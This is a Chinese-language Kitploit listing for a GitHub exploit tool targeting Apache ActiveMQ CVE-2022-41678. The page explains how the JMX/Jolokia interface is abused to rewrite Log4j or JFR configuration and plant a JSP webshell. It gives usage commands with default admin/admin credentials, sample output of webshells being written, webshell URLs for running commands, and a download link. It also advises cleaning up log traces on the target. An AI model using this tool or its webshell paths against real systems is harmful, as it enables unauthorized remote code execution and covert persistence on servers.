Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2022-41678 — CVE-2022-41678 是 Apache ActiveMQ 中的一个远程代码执行漏洞。该漏洞允许攻击者通过 JMX (Java Management Extensions) 接口修改 Log4j 配置或 JFR (Java Flight Recorder) 配置,从而写入恶意的 JSP webshell 到服务器的 web 目录中,最终实现远程代码执行。 | Kitploit
工具/GitHubGitHub/urjack2025/cve-2022-41678
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试远程访问工具
GitHuburjack2025/cve-2022-41678

CVE-2022-41678

CVE-2022-41678 是 Apache ActiveMQ 中的一个远程代码执行漏洞。该漏洞允许攻击者通过 JMX (Java Management Extensions) 接口修改 Log4j 配置或 JFR (Java Flight Recorder) 配置,从而写入恶意的 JSP webshell 到服务器的 web 目录中,最终实现远程代码执行。

查看仓库
2211个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Apache ActiveMQ CVE-2022-41678 漏洞利用工具

漏洞简介

参考文档: https://app.nextcyber.cn/courses/41/tasks/580

CVE-2022-41678 是 Apache ActiveMQ 中的一个远程代码执行漏洞。该漏洞允许攻击者通过 JMX (Java Management Extensions) 接口修改 Log4j 配置或 JFR (Java Flight Recorder) 配置,从而写入恶意的 JSP webshell 到服务器的 web 目录中,最终实现远程代码执行。

此漏洞影响 Apache ActiveMQ 多个版本,具体受影响版本取决于 Log4j 和 JFR 配置的使用情况。

环境要求

  • Python 3.6 及以上版本
  • 安装所需依赖:
    root@kitploit:~
    pip install requests
    
  • 目标 ActiveMQ 服务器需要开启 JMX 接口(通常通过 /api/jolokia/ 路径访问)
  • 攻击者需要知道 ActiveMQ 控制台的用户名和密码(默认通常为 admin/admin)

使用方法

基本用法

使用默认的 admin/admin 凭据和自动检测的利用方式:

root@kitploit:~
python exp.py http://target:8161

也可以通过-u和-p参数指定用户名和密码:

root@kitploit:~
# 使用 Log4j
python exp.py -u admin -p admin http://10.22.174.214:8161

# 执行结果如下
python exp.py -u admin -p admin http://10.22.174.214:8161
2025-10-14 22:53:54,115 - INFO - choice MBean 'org.apache.logging.log4j2:type=5faeada1' automatically
2025-10-14 22:53:54,334 - INFO - update log config
2025-10-14 22:53:54,467 - INFO - write webshell to http://10.22.174.214:8161/admin/shell.jsp?cmd=id
2025-10-14 22:53:54,655 - INFO - restore log config

除了默认使用的 Log4j 利用方式,还可以通过--exploit jfr参数指定使用 JFR 利用方式。

root@kitploit:~
# 使用 JFR 方式
python exp.py -u admin -p admin --exploit jfr http://10.22.174.214:8161

# 执行结果如下
python exp.py -u admin -p admin --exploit jfr http://10.22.174.214:8161/
2025-10-14 23:16:35,978 - INFO - choice MBean jdk.management.jfr:type=FlightRecorder manually
2025-10-14 23:16:37,390 - INFO - create flight record, id = 1
2025-10-14 23:16:37,533 - INFO - update configuration for record 1
2025-10-14 23:16:38,167 - INFO - start record
2025-10-14 23:16:39,243 - INFO - stop record
2025-10-14 23:16:39,309 - INFO - write webshell to http://10.22.174.214:8161/admin/shelljfr.jsp?cmd=id

验证利用结果

成功利用后,可以通过访问以下 URL 来执行命令:

root@kitploit:~
# Log4j 方式写入的 webshell
http://target:8161/admin/shell.jsp?cmd=命令

# JFR 方式写入的 webshell
http://target:8161/admin/shelljfr.jsp?cmd=命令

例如,执行 id 命令:

root@kitploit:~
http://target:8161/admin/shell.jsp?cmd=id

工具参数说明

注意事项

  1. 此工具仅供安全研究和授权测试使用,请勿用于未授权的系统。
  2. 成功利用后,工具会尝试恢复原始的 Log4j 配置,以尽量减少对目标系统的影响。
  3. 如果目标系统有网络访问限制,可能需要调整网络配置以确保能够访问目标的 JMX 接口。
  4. 不同版本的 ActiveMQ 可能有不同的路径和配置,可能需要根据实际情况调整工具中的路径。
  5. 工具使用 JMX 接口进行操作,需要确保目标 ActiveMQ 启用了此接口。
  6. 执行此工具可能会在目标系统上留下日志记录,请注意清理相关痕迹。
下载工具
参数简写类型默认值描述
--username-u字符串adminActiveMQ 控制台的用户名
--password-p字符串adminActiveMQ 控制台的密码
--exploit-e字符串auto利用方式,可选值:auto, log4j, jfr
url-字符串-目标 ActiveMQ 的 URL 地址(必需参数)